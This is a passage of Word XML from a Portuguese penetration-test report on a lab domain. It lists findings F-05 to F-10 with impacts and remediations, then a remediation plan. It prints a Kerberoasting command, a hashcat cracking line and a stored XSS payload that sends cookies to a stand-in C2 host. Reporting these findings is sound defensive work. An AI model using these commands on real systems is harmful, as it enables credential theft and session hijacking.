          <w:i/>
          <w:iCs/>
          <w:color w:val="64748B"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Extração e quebra offline do hash de serviço</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5F1D5B" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="0F172A"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>GetUserSPNs.py acme.example/teste:'&lt;senha-lab&gt;' -dc-ip 10.20.10.5 -request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF61A48" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="0F172A"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>hashcat -m 13100 svc_sql.hash rockyou.txt   # senha recuperada offline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125AF70E" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="EA580C"/>
        </w:pBdr>
        <w:spacing w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="194FE3"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Impacto: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Movimentação lateral e elevação para conta privilegiada do domínio de teste.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C47EB8" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="EA580C"/>
        </w:pBdr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="194FE3"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediação: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Adotar gMSA ou senhas longas/aleatórias para contas de serviço; monitorar solicitações TGS-REQ anômalas e remover SPNs desnecessários.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3E403E" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="D97706"/>
        </w:pBdr>
        <w:spacing w:before="140" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">F-07 — Ausência de MFA no acesso VPN  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D97706"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>MÉDIO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E337DD7" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="D97706"/>
        </w:pBdr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>CVSS 6.5 · CWE-308 · Rede · Afetado: vpn.acme.example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386F6990" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="D97706"/>
        </w:pBdr>
        <w:spacing w:after="40"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>O acesso remoto via VPN depende apenas de usuário e senha, sem segundo fator, ampliando o impacto de credenciais vazadas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25318597" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="D97706"/>
        </w:pBdr>
        <w:spacing w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="194FE3"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Impacto: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Acesso inicial à rede interna a partir de credenciais comprometidas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DEC83F" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="D97706"/>
        </w:pBdr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="194FE3"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediação: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Exigir MFA resistente a phishing (FIDO2/WebAuthn) no acesso remoto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B50349" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="D97706"/>
        </w:pBdr>
        <w:spacing w:before="140" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">F-05 — Cross-Site Scripting armazenado em avaliações  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D97706"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>MÉDIO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134BDEAA" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="D97706"/>
        </w:pBdr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>CVSS 6.1 · CWE-79 · Aplicação Web · Afetado: loja.acme.example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A9DCBF" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="D97706"/>
        </w:pBdr>
        <w:spacing w:after="40"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Payloads persistem no campo de comentário de avaliação e executam no contexto de outros usuários, permitindo roubo de sessão e ações em nome da vítima.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F86860B" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="D97706"/>
        </w:pBdr>
        <w:spacing w:before="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="64748B"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Payload persistente em avaliação de produto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D13B1A" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="0F172A"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>&lt;img src=x onerror="fetch('https://c2.teste/'+document.cookie)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D50585" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="D97706"/>
        </w:pBdr>
        <w:spacing w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="194FE3"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Impacto: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Sequestro de sessão de clientes e potencial fraude.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E41BE8B" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="D97706"/>
        </w:pBdr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="194FE3"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediação: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Codificação de saída por contexto, sanitização no servidor e Content-Security-Policy estrita.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B37C4AB" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="D97706"/>
        </w:pBdr>
        <w:spacing w:before="140" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">F-06 — SMB signing desabilitado (NTLM relay)  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="D97706"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>MÉDIO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3580BCB9" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="D97706"/>
        </w:pBdr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>CVSS 5.9 · MITRE T1557.001 · Rede · Afetado: 10.20.0.0/16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D4CE90" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="D97706"/>
        </w:pBdr>
        <w:spacing w:after="40"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Hosts sem assinatura SMB permitem o relay de autenticação NTLM, viabilizando autenticação como a vítima em outros serviços.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D053D7C" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="D97706"/>
        </w:pBdr>
        <w:spacing w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="194FE3"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Impacto: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Movimentação lateral e acesso não autorizado a recursos de rede.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D148959" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="D97706"/>
        </w:pBdr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="194FE3"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediação: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Habilitar/forçar SMB signing via GPO e desabilitar NTLM onde possível.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E60A39" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="2563EB"/>
        </w:pBdr>
        <w:spacing w:before="140" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">F-08 — Cabeçalhos de segurança e configuração TLS fracos  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>BAIXO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F232651" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="2563EB"/>
        </w:pBdr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>CVSS 3.7 · CWE-693 · Configuração · Afetado: loja.acme.example, api.acme.example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1281C3C6" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="2563EB"/>
        </w:pBdr>
        <w:spacing w:after="40"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Ausência de cabeçalhos como HSTS, X-Content-Type-Options e CSP, além de suites TLS legadas habilitadas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17404E4F" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="2563EB"/>
        </w:pBdr>
        <w:spacing w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="194FE3"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Impacto: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Facilita ataques de downgrade, sniffing e injeção de conteúdo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1908FC33" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="2563EB"/>
        </w:pBdr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="194FE3"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediação: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Adicionar HSTS, CSP e cabeçalhos defensivos; desabilitar suites TLS legadas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BFFFA8" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="2563EB"/>
        </w:pBdr>
        <w:spacing w:before="140" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">F-09 — Divulgação de informação em mensagens de erro  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2563EB"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>BAIXO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BF7C50" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="2563EB"/>
        </w:pBdr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>CVSS 3.1 · CWE-209 · Aplicação Web · Afetado: api.acme.example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7510F050" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="2563EB"/>
        </w:pBdr>
        <w:spacing w:after="40"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Respostas de erro expõem stack traces e versões de componentes, auxiliando o atacante na construção de exploits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E01271" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="2563EB"/>
        </w:pBdr>
        <w:spacing w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="194FE3"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Impacto: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Reduz o esforço de reconhecimento do atacante.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203049C0" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="2563EB"/>
        </w:pBdr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="194FE3"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediação: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Padronizar respostas de erro genéricas e registrar detalhes apenas no servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778A1646" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="64748B"/>
        </w:pBdr>
        <w:spacing w:before="140" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">F-10 — Divulgação de versões de software (banners)  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="64748B"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>INFO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07857F3B" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="64748B"/>
        </w:pBdr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="64748B"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>CVSS 0.0 · CWE-200 · Configuração · Afetado: loja.acme.example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276EC164" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="64748B"/>
        </w:pBdr>
        <w:spacing w:after="40"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Banners de serviço revelam versões exatas de nginx e do runtime, úteis para correlação com CVEs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFDF3B1" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="64748B"/>
        </w:pBdr>
        <w:spacing w:before="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="194FE3"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Impacto: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Informativo; contribui para o reconhecimento.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7AA963" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="24" w:space="8" w:color="64748B"/>
        </w:pBdr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="194FE3"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">Remediação: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Ocultar/normalizar banners e cabeçalhos de versão.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC11DDF" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="194FE3"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>SEÇÃO 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA3C4DD" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="12" w:space="4" w:color="194FE3"/>
        </w:pBdr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>Plano de Ação</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC40564" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="100"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="334155"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Roteiro priorizado por risco e esforço. Os quick wins (alto impacto, baixo esforço) vêm primeiro; o gráfico de prazos mostra o que leva mais e menos tempo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0F7C28" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Roteiro de remediação</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1AF887" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6091F1D7" wp14:editId="59F7B679">
            <wp:extent cx="5715000" cy="619125"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1185062691" name="Picture 11850626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61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21"/>
        <w:gridCol w:w="5125"/>
      </w:tblGrid>
      <w:tr w:rsidR="00287A86" w14:paraId="399B300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8BD1F66" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/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0F2012FB" wp14:editId="5C84E48C">
                  <wp:extent cx="2571750" cy="2571750"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="169681822" name="Picture 16968182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71750" cy="2571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A6A430D" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="80" w:after="80"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7140C5FE" wp14:editId="5CF89A22">
                  <wp:extent cx="2857500" cy="1800225"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="2067895137" name="Picture 206789513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7500" cy="18002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18D4785" w14:textId="77777777" w:rsidR="00287A86" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="120" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0F172A"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Itens de correção priorizados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E2E8F0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60"/>
        <w:gridCol w:w="682"/>
        <w:gridCol w:w="4970"/>
        <w:gridCol w:w="1072"/>
        <w:gridCol w:w="780"/>
        <w:gridCol w:w="682"/>
      </w:tblGrid>
      <w:tr w:rsidR="00287A86" w14:paraId="27EAA46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pct"/>
